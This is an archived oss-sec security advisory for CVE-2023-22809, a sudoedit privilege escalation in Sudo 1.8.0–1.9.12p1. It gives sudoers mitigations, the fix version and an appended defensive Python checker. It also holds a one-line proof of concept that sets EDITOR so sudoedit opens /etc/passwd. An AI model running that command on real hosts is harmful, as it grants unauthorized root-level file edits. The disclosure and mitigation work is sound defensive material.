Sudoedit can edit arbitrary files
by Phil Tadros
January 19, 2023

2023-01-19 15:05:26
oss-sec mailing list archives
From: Matthieu Barjole <matthieu.barjole () synacktiv com>
Date: Thu, 19 Jan 2023 01:33:43 +0100
Hello everyone,

While auditing Sudo, Synacktiv identified a privilege escalation in sudoedit when a user is allowed to use it by the sudoers policy. This vulnerability was assigned CVE-2023-22809 and affects Sudo versions 1.8.0 through 1.9.12p1 inclusive.

## Analysis

The technical analysis can be found in the following security advisory:
https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf

## Proof of Concept

Assuming the following sudoers policy:

```
# cat /etc/sudoers
user ALL=(ALL:ALL) sudoedit /etc/motd
[...]
```

Arbitrary files such as `/etc/passwd` can be edited as such:

```
EDITOR='vim -- /etc/passwd' sudoedit /etc/motd
```

## Mitigation

It is possible to prevent a user-specified editor from being used by sudoedit by adding the following line to the sudoers file.

```
Defaults!sudoedit env_delete+="SUDO_EDITOR VISUAL EDITOR"
```

To restrict the editor when editing specific files, a Cmnd_Alias can be used, for instance:

```
Cmnd_Alias EDIT_MOTD = sudoedit /etc/motd
Defaults!EDIT_MOTD env_delete+="SUDO_EDITOR VISUAL EDITOR"
user ALL = EDIT_MOTD
```

## Fix

The issue was fixed in Sudo 1.9.12.p2.

## References

[1] https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf
[2] https://www.sudo.ws/security/advisories/sudoedit_any/
[3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22809
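An added defender-side check, not part of the post above or of the Sudo project: it decides whether a `sudo -V` version string falls in the affected range the advisory gives, and whether a sudoers text applies the env_delete mitigation to every sudoedit grant, either globally or through a Cmnd_Alias as in the post. The sudoers parser is a deliberate simplification (no #include, command tags or User_Alias handling), and the sample policies are constructed.

```python
import re
# Affected range from the advisory: 1.8.0 through 1.9.12p1 inclusive.
AFFECTED_MIN, AFFECTED_MAX = (1, 8, 0, 0), (1, 9, 12, 1)
EDITOR_VARS = {"SUDO_EDITOR", "VISUAL", "EDITOR"}

def parse_sudo_version(text):
    """'1.9.12p1' or the first line of `sudo -V` -> (major, minor, micro, patch)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:\.?p(\d+))?", text)
    if not m:
        raise ValueError(f"no sudo version in {text!r}")
    major, minor, micro, patch = m.groups()
    return (int(major), int(minor), int(micro), int(patch or 0))  # no 'pN' -> 0

def is_affected(version_text):
    """True when the version lies inside the CVE-2023-22809 range above."""
    return AFFECTED_MIN <= parse_sudo_version(version_text) <= AFFECTED_MAX

def sudoedit_grants_mitigated(sudoers_text):
    """True when every sudoedit grant is covered by an env_delete of all three editor
    variables, via Defaults!sudoedit or a Cmnd_Alias-scoped Defaults (simplified parser)."""
    aliases, locked, grants = {}, set(), []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if m := re.match(r"Cmnd_Alias\s+(\w+)\s*=\s*(.+)", line):
            aliases[m.group(1)] = [c.strip() for c in m.group(2).split(",")]
        elif m := re.match(r'Defaults!(\S+)\s+env_delete\+?=\s*"([^"]*)"', line):
            if EDITOR_VARS <= set(m.group(2).split()):
                locked.add(m.group(1))
        elif line.startswith("Defaults"):
            continue  # other Defaults lines are irrelevant here
        elif m := re.match(r"\S+\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(.+)", line):
            grants.extend(c.strip() for c in m.group(1).split(","))  # user spec
    if "sudoedit" in locked:
        return True  # Defaults!sudoedit covers every sudoedit invocation
    for cmd in grants:
        if cmd in aliases:
            if cmd not in locked and any(c.startswith("sudoedit") for c in aliases[cmd]):
                return False
        elif cmd.startswith("sudoedit"):
            return False  # direct sudoedit grant with the editor still user-controlled
    return True

# Constructed sudoers samples (not from any real host): the open policy and the fix.
SUDOERS_OPEN = "user ALL=(ALL:ALL) sudoedit /etc/motd\n"
SUDOERS_FIXED = ("Cmnd_Alias EDIT_MOTD = sudoedit /etc/motd\n"
                 'Defaults!EDIT_MOTD env_delete+="SUDO_EDITOR VISUAL EDITOR"\n'
                 "user ALL = EDIT_MOTD\n")
```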
Current thread:
- CVE-2023-22809: Sudoedit can edit arbitrary files Matthieu Barjole (Jan 18)